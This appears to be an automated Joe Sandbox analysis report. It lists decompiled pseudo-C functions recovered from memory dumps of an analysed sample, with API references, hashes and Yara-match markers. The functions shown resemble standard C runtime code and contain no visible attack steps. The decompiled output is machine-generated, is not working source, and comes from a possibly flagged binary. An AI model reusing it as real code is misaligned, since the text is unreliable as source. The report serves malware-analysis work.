C-Code - Quality: 92%

			E00E82D58(void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr* _t6;
				intOrPtr* _t8;
				intOrPtr* _t11;

				_t8 = _a4;
				_t11 =  *_t8;
				if( *_t11 != 0xe06d7363 ||  *((intOrPtr*)(_t11 + 0x10)) != 3) {
					L6:
					return 0;
				} else {
					_t6 =  *((intOrPtr*)(_t11 + 0x14));
					if(_t6 == 0x19930520 || _t6 == 0x19930521 || _t6 == 0x19930522 || _t6 == 0x1994000) {
						L00E82FAC();
						 *_t6 = _t11;
						L00E82FB2();
						 *_t6 =  *((intOrPtr*)(_t8 + 4));
						L00E83048();
						asm("int3");
						 *0xecf1ec =  *0xecf1ec & 0x00000000;
						return _t6;
					} else {
						goto L6;
					}
				}
			}

APIs

__current_exception.VCRUNTIME140 ref: 00E82D97
__current_exception_context.VCRUNTIME140 ref: 00E82DA1
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E82DA8

Strings

csm, xrefs: 00E82D62

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: d3c885f3b52beb47acdccea37eefbd90a0e5ade9118c219a20bc039a0049a28f
Instruction ID: f49d7965150dd85130694984c43a4708c28da1e9b1b163db276dc3f34334f747
Opcode Fuzzy Hash: d3c885f3b52beb47acdccea37eefbd90a0e5ade9118c219a20bc039a0049a28f
Instruction Fuzzy Hash: B9F082751002016F8B307E69940402DBFECAE90725798181EF64CBB690C720AD92C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0041714D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,?,0040BE6C,?,?,?,004341E4,000000FF), ref: 00417159
IsWow64Process.KERNEL32(00000000,?,?,0040BE6C,?,?,?,004341E4,000000FF), ref: 00417160

Strings

x86, xrefs: 00417175
x64, xrefs: 0041716E

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: 3ea9a9bb8d1b05e6de9b8573b2df4e3b06c523e3f643c40cd8a1508d2800b476
Instruction ID: 69a5cdaa68f9bcac0c9d9cd732403a9e4c3ca87fd327b71e729e1bb255db017b
Opcode Fuzzy Hash: 3ea9a9bb8d1b05e6de9b8573b2df4e3b06c523e3f643c40cd8a1508d2800b476
Instruction Fuzzy Hash: EBD01731914208B7DB008BE4880978A76BCEB09349F108076A401D6250DB7CDA088B68

Uniqueness

Uniqueness Score: -1.00%

Function 00422AF4 Relevance: 6.1, APIs: 4, Instructions: 130
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00422AF4(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E004265C0(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E00428D34(_t96));
										_t71 = E00429C0F(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E00422674(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E0041F8C0( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00424F30(_t100))) = 0x16;
					E004268AE();
					goto L4;
				}
			}

0x00422aff
0x00422b04
0x00422b23
0x00000000
0x00422b0c
0x00422b0c
0x00422b0f
0x00422b11
0x00422b2a
0x00422b2d
0x00422b2f
0x00000000
0x00000000
0x00422b31
0x00422b36
0x00422b38
0x00422b3b
0x00000000
0x00000000
0x00422b3d
0x00422b41
0x00422b48
0x00422b4b
0x00422b4e
0x00422b50
0x00422b5a
0x00422b52
0x00422b55
0x00422b55
0x00422b61
0x00422b63
0x00422c28
0x00000000
0x00422b69
0x00422b69
0x00422b6c
0x00422b6c
0x00422b72
0x00422ba3
0x00422ba3
0x00422ba6
0x00422bff
0x00422c06
0x00422c09
0x00422c34
0x00422c34
0x00422c36
0x00000000
0x00422c3a
0x00422c0b
0x00422c0e
0x00422c11
0x00422c12
0x00422c15
0x00422c17
0x00422c19
0x00422c19
0x00000000
0x00422c17
0x00422ba8
0x00422baa
0x00422bb7
0x00422bb7
0x00422bbb
0x00422bbd
0x00422bc1
0x00422bc3
0x00422bc6
0x00422bc6
0x00422bc6
0x00422bc8
0x00422bc9
0x00422bd3
0x00422bd4
0x00422bd9
0x00422bdc
0x00422bdf
0x00422c42
0x00422c42
0x00422c46
0x00000000
0x00422be1
0x00422be1
0x00422be3
0x00422be5
0x00422be7
0x00422be7
0x00422be9
0x00422bec
0x00422bee
0x00422bf0
0x00000000
0x00422bf2
0x00422bf2
0x00422bf2
0x00000000
0x00422bf2
0x00422bf0
0x00422bdf
0x00422bad
0x00422bb3
0x00422bb5
0x00000000
0x00000000
0x00000000
0x00422bb5
0x00422b74
0x00422b77
0x00422b79
0x00000000
0x00000000
0x00422b7b
0x00422c30
0x00422c30
0x00422c30
0x00000000
0x00422c30
0x00422b81
0x00422b83
0x00422b85
0x00422b87
0x00422b87
0x00422b8f
0x00422b94
0x00422b97
0x00422b99
0x00422b9c
0x00422b9e
0x00000000
0x00422c20
0x00422c20
0x00422c20
0x00000000
0x00422b69
0x00422b63
0x00422b13
0x00422b18
0x00422b1e
0x00000000
0x00422b1e

APIs

_memmove.LIBCMT ref: 00422B8F
__flush.LIBCMT ref: 00422BAD
__write.LIBCMT ref: 00422BD4
__flsbuf.LIBCMT ref: 00422BFF

Part of subcall function 00424F30: __getptd_noexit.LIBCMT ref: 00424F30

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: ebb1f20f1c6fe8313b16633736c921874d1734c27a161ac2b47902a0c9c17c03
Instruction ID: 0ed386a47a4e849884684adb8dac1caca86e1bfad9f4e262a4f9925b95f5dec5
Opcode Fuzzy Hash: ebb1f20f1c6fe8313b16633736c921874d1734c27a161ac2b47902a0c9c17c03
Instruction Fuzzy Hash: 7341C731B00724BBDB259F66AA4469FBBB1AF80320F64466FE41597240D7F8EE41DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0042E78C Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042E78C(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E004204E7( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0042A06F( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00424F30(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x50036ad0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x50036ad0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x50036ad0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0042e796
0x0042e79d
0x0042e7b4
0x00000000
0x0042e7a4
0x0042e7a6
0x0042e7c0
0x0042e7c5
0x0042e7c8
0x0042e7cb
0x0042e7f3
0x0042e7fa
0x0042e7fc
0x0042e87d
0x0042e88f
0x0042e898
0x0042e89a
0x0042e7da
0x0042e7da
0x0042e7dd
0x0042e7df
0x0042e7e2
0x0042e7e2
0x0042e7e2
0x0042e7e2
0x00000000
0x0042e7e8
0x0042e85c
0x0042e85c
0x0042e861
0x0042e867
0x0042e86a
0x0042e86c
0x0042e86f
0x0042e86f
0x0042e86f
0x0042e86f
0x00000000
0x0042e873
0x0042e7fe
0x0042e801
0x0042e801
0x0042e807
0x0042e80a
0x0042e831
0x0042e834
0x0042e834
0x0042e83a
0x00000000
0x00000000
0x0042e83c
0x0042e83f
0x00000000
0x00000000
0x0042e841
0x0042e841
0x0042e841
0x0042e847
0x0042e84a
0x0042e7b9
0x0042e7b9
0x0042e853
0x00000000
0x0042e853
0x0042e80c
0x0042e80f
0x00000000
0x00000000
0x0042e813
0x0042e821
0x0042e824
0x0042e82a
0x0042e82c
0x0042e82f
0x00000000
0x00000000
0x00000000
0x0042e82f
0x0042e7cd
0x0042e7d0
0x0042e7d2
0x0042e7d7
0x0042e7d7
0x00000000
0x0042e7a8
0x0042e7a8
0x0042e7ad
0x0042e7b1
0x0042e7b1
0x00000000
0x0042e7ad
0x0042e7a6

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042E7C0
__isleadbyte_l.LIBCMT ref: 0042E7F3
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0042F3F9,00000109,00BFBBEF,00000003), ref: 0042E824
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0042F3F9,00000109,00BFBBEF,00000003), ref: 0042E892

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3c4c941a117b8444102670997ee4c2420b8ac4d156fef5a735bd0bb857b42d14
Instruction ID: 49a695fe2fc2a0060f25c9ed754f620347eee5bb7f7dab25503f4dbe8ebf7ded
Opcode Fuzzy Hash: 3c4c941a117b8444102670997ee4c2420b8ac4d156fef5a735bd0bb857b42d14
Instruction Fuzzy Hash: B531F330B00265EFDB20DFA5E880ABE7BB1FF40310B55856EE5919B291E734DD40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F314 Relevance: 6.1, APIs: 4, Instructions: 100
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0041F314(signed int _a4, signed int _a8, signed int _a9, char _a10) {
				signed char _v7;
				signed char _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				intOrPtr _t42;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				intOrPtr _t57;
				signed int _t59;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t76;

				_t76 = _a8;
				_t79 = _t76;
				if(_t76 != 0) {
					_v16 =  *_t76;
					_t42 =  *((intOrPtr*)(_t76 + 4));
				} else {
					_v16 =  *((intOrPtr*)(E00424DE9(_t72, _t73, _t76, _t79) + 8));
					_t42 = E00424DC3(_t72, _t73, _t76, _t79);
				}
				_v20 = _t42;
				if(_v16 != 0) {
					_t64 = _a4;
					_push(_t73);
					__eflags = _t64 - 0x100;
					if(_t64 >= 0x100) {
						L11:
						__eflags = _t76;
						if(__eflags != 0) {
							_v12 = _t64;
							_v12 = _v12 >> 8;
							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
							__eflags = _t47;
							L14:
							__eflags = _t47;
							if(__eflags == 0) {
								_a8 = _t64;
								_a9 = 0;
								__eflags = 1;
							} else {
								_push(2);
								_a8 = _v12;
								_a9 = _t64;
								_a10 = 0;
								_pop(1);
							}
							_t51 = E00424830(0x100, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
							__eflags = _t51;
							if(_t51 != 0) {
								__eflags = _t51 - 1;
								_t52 = _v8 & 0x000000ff;
								if(_t51 != 1) {
									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
									__eflags = _t52;
								}
								goto L21;
							} else {
								L18:
								_t52 = _t64;
								L21:
								return _t52;
							}
						}
						L12:
						_v12 = _t64;
						_v12 = _v12 >> 8;
						_t47 =  *(E00424876(_t72, 0x100, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
						goto L14;
					}
					__eflags = _t76;
					if(_t76 != 0) {
						_t57 =  *((intOrPtr*)(_t76 + 8));
						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
							goto L18;
						}
						goto L11;
					}
					__eflags = E004248F0(_t64);
					if(__eflags != 0) {
						goto L12;
					}
					goto L18;
				} else {
					_t59 = _a4;
					if(_t59 - 0x41 > 0x19) {
						return _t59;
					}
					return _t59 + 0x20;
				}
			}

0x0041f31d
0x0041f320
0x0041f322
0x0041f338
0x0041f33b
0x0041f324
0x0041f32c
0x0041f32f
0x0041f32f
0x0041f342
0x0041f345
0x0041f35f
0x0041f362
0x0041f368
0x0041f36a
0x0041f389
0x0041f389
0x0041f38b
0x0041f3ab
0x0041f3ae
0x0041f3c1
0x0041f3c1
0x0041f3c4
0x0041f3c4
0x0041f3c6
0x0041f3dc
0x0041f3df
0x0041f3e3
0x0041f3c8
0x0041f3cb
0x0041f3cd
0x0041f3d0
0x0041f3d3
0x0041f3d7
0x0041f3d7
0x0041f3fa
0x0041f402
0x0041f404
0x0041f40a
0x0041f40d
0x0041f411
0x0041f41a
0x0041f41a
0x0041f41a
0x00000000
0x0041f406
0x0041f406
0x0041f406
0x0041f41c
0x00000000
0x0041f41d
0x0041f404
0x0041f38d
0x0041f38d
0x0041f390
0x0041f3a1
0x00000000
0x0041f3a1
0x0041f36c
0x0041f36e
0x0041f380
0x0041f383
0x0041f387
0x00000000
0x00000000
0x00000000
0x0041f387
0x0041f377
0x0041f379
0x00000000
0x00000000
0x00000000
0x0041f347
0x0041f347
0x0041f350
0x0041f420
0x0041f420
0x00000000
0x0041f356

APIs

____lc_handle_func.LIBCMT ref: 0041F324

Part of subcall function 00424DE9: __getptd.LIBCMT ref: 00424DE9

____lc_codepage_func.LIBCMT ref: 0041F32F

Part of subcall function 00424DC3: __getptd.LIBCMT ref: 00424DC3

___pctype_func.LIBCMT ref: 0041F394
___crtLCMapStringA.LIBCMT ref: 0041F3FA

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
String ID:
API String ID: 3477544643-0
Opcode ID: f0253cb54c95b48ca8220bda4ae551cf6574e02b98b97ded5cd7545c3e8d5232
Instruction ID: aefdebb6815e63634cd9cc041aa59dbeb3acf66007f91547e7616950dbbf5e44
Opcode Fuzzy Hash: f0253cb54c95b48ca8220bda4ae551cf6574e02b98b97ded5cd7545c3e8d5232
Instruction Fuzzy Hash: 8A31FB71904258ABDB21CF55C851BEE7BA4EF60304F18806BEC65DB242D27CEA86CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE59 Relevance: 6.1, APIs: 4, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041DE59(intOrPtr __ebx, void* _a4, void _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed short _v28;
				signed short _v32;
				void* _v36;
				struct _FILETIME _v44;
				void* __edi;
				void* __esi;
				signed int _t42;
				void* _t44;
				void _t48;
				intOrPtr _t54;
				intOrPtr _t62;
				signed int _t65;
				signed int _t71;

				_t62 = __ebx;
				_t42 =  *0x444664; // 0xfa3a0753
				_v8 = _t42 ^ _t71;
				_t44 = _a4;
				_t69 = 0;
				_t70 = __ebx + 0x70;
				_v36 = _t44;
				 *(__ebx + 0x7c) = 0;
				 *((intOrPtr*)(__ebx + 0x84)) = 0;
				 *((char*)(__ebx + 0x80)) = 0;
				 *((intOrPtr*)(__ebx + 0x78)) = 0;
				 *_t70 = 0;
				 *((intOrPtr*)(__ebx + 0x90)) = 0;
				 *((intOrPtr*)(__ebx + 0x74)) = 0;
				if(_t44 == 0 || _t44 == 0xffffffff) {
					_t45 = 0x10000;
				} else {
					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
						_t48 = _a8;
						 *_t70 =  *_t70 | 0xffffffff;
						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
						if(_t48 != 0) {
							 *_t70 = _t48;
						}
						 *((char*)(_t62 + 0x6c)) = 0;
						GetLocalTime( &_v24);
						SystemTimeToFileTime( &_v24,  &_v44);
						_push(_v44.dwHighDateTime);
						_t69 =  &_v28;
						_t70 =  &_v32;
						E0041D985( &_v28,  &_v32, _v44.dwLowDateTime);
						_t54 = E0041D961(_v44.dwLowDateTime, _v44.dwHighDateTime);
						 *((intOrPtr*)(_t62 + 0x50)) = _t54;
						 *((intOrPtr*)(_t62 + 0x58)) = _t54;
						 *((intOrPtr*)(_t62 + 0x60)) = _t54;
						_t65 = _t68;
						 *((intOrPtr*)(_t62 + 0x5c)) = _t65;
						 *((intOrPtr*)(_t62 + 0x64)) = _t65;
						 *(_t62 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
						 *((intOrPtr*)(_t62 + 0x54)) = _t68;
						 *((intOrPtr*)(_t62 + 0x7c)) = _v36;
						goto L5;
					} else {
						_t70 = _v36;
						_t68 = __ebx + 0x50;
						if(E0041D9EC(_t70, __ebx + 0x50, __ebx + 0x4c, _t70, __ebx + 0x68) == 0) {
							SetFilePointer(_t70, 0, 0, 0);
							 *((char*)(__ebx + 0x6c)) = 1;
							 *(__ebx + 0x7c) = _t70;
							L5:
							_t45 = 0;
						}
					}
				}
				return E0041F69E(_t45, _t62, _v8 ^ _t71, _t68, _t69, _t70);
			}

0x0041de59
0x0041de5f
0x0041de66
0x0041de69
0x0041de6e
0x0041de70
0x0041de73
0x0041de76
0x0041de79
0x0041de7f
0x0041de86
0x0041de89
0x0041de8b
0x0041de91
0x0041de96
0x0041df67
0x0041dea5
0x0041deb5
0x0041deed
0x0041def0
0x0041def3
0x0041defc
0x0041defe
0x0041defe
0x0041df04
0x0041df08
0x0041df16
0x0041df1c
0x0041df1f
0x0041df25
0x0041df28
0x0041df33
0x0041df38
0x0041df3b
0x0041df3e
0x0041df45
0x0041df47
0x0041df4a
0x0041df59
0x0041df5f
0x0041df62
0x00000000
0x0041deb7
0x0041debc
0x0041dec2
0x0041ded2
0x0041dedc
0x0041dee2
0x0041dee6
0x0041dee9
0x0041dee9
0x0041dee9
0x0041ded2
0x0041deb5
0x0041df79

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,?,?,0041E438,?,?,?), ref: 0041DEAC
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041E438,?,?), ref: 0041DEDC
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041E438,?,?,?), ref: 0041DF08
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041E438,?,?,?), ref: 0041DF16

Part of subcall function 0041D9EC: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041DA1A

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: af40493984b838be7e4da9ca25bab0c4a28e951facbab42a63ce8c0a99bd67dd
Instruction ID: 3759a72480373fa032e418592f92163eb0a0d950e6761542d965aeec75505e44
Opcode Fuzzy Hash: af40493984b838be7e4da9ca25bab0c4a28e951facbab42a63ce8c0a99bd67dd
Instruction Fuzzy Hash: D1414AB19002099FCF50DF69C880ADEBBF8FF89310F10016AE855EB266D7349986CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041792D Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041792D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t27;
				signed int _t28;
				void* _t34;
				signed int _t45;
				signed int _t46;
				signed int _t54;
				void* _t58;
				signed int _t60;
				void* _t62;

				_t57 = __edi;
				_push(8);
				E00423610(E0043314D, __ebx, __edi, __esi);
				 *(_t62 - 0x14) =  *(_t62 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t62 - 0x10)) =  *((intOrPtr*)(_t62 + 8));
				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
				_t27 =  *((intOrPtr*)(_t62 + 0xc));
				if( *((intOrPtr*)(_t62 + 0x20)) < 0x10) {
					_t27 = _t62 + 0xc;
				}
				_t28 = E004201E0(_t27);
				_t60 = 3;
				_t45 = _t28;
				_t54 = _t28 % _t60;
				if(_t54 != 0) {
					_t45 = _t45 - _t54 + _t60;
				}
				_t31 = _t45 << 3;
				_t46 = 6;
				_t34 = E0041FC5B((_t45 << 3) % _t46, _t57, _t60, _t31 / _t46 + 1);
				_t61 =  *((intOrPtr*)(_t62 + 0xc));
				_t58 = _t34;
				_t35 =  *((intOrPtr*)(_t62 + 0xc));
				if( *((intOrPtr*)(_t62 + 0x20)) < 0x10) {
					_t35 = _t62 + 0xc;
					_t61 = _t62 + 0xc;
				}
				E0041788B(_t61, _t58, E004201E0(_t35));
				E004049CF( *((intOrPtr*)(_t62 - 0x10)), _t58);
				E00404A66(_t62 + 0xc, 1, 0);
				return E004236AF( *((intOrPtr*)(_t62 - 0x10)));
			}

0x0041792d
0x0041792d
0x00417934
0x0041793c
0x00417940
0x00417943
0x0041794b
0x0041794e
0x00417950
0x00417950
0x00417954
0x0041795e
0x0041795f
0x00417961
0x00417965
0x00417969
0x00417969
0x0041796f
0x00417974
0x00417979
0x00417982
0x00417985
0x00417988
0x0041798a
0x0041798c
0x0041798f
0x0041798f
0x0041799d
0x004179a6
0x004179b2
0x004179bf

APIs

__EH_prolog3.LIBCMT ref: 00417934
_strlen.LIBCMT ref: 00417954
_malloc.LIBCMT ref: 00417979
_strlen.LIBCMT ref: 00417992

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3_malloc
String ID:
API String ID: 2138385043-0
Opcode ID: 28b556ed22f3101eaea3ad597b194657c8e7906ee2e26988925c7538c7510cfb
Instruction ID: 64a818b2b8f2b99c1ead4a931bd4b9a634919b1074684cbf438407f32e99d45b
Opcode Fuzzy Hash: 28b556ed22f3101eaea3ad597b194657c8e7906ee2e26988925c7538c7510cfb
Instruction Fuzzy Hash: 4C11C2717501149BEF04EE65C806BFE33B5EB84314F04812FF805AB281DBBC9E448788

Uniqueness

Uniqueness Score: -1.00%

Function 00430771 Relevance: 6.0, APIs: 4, Instructions: 49
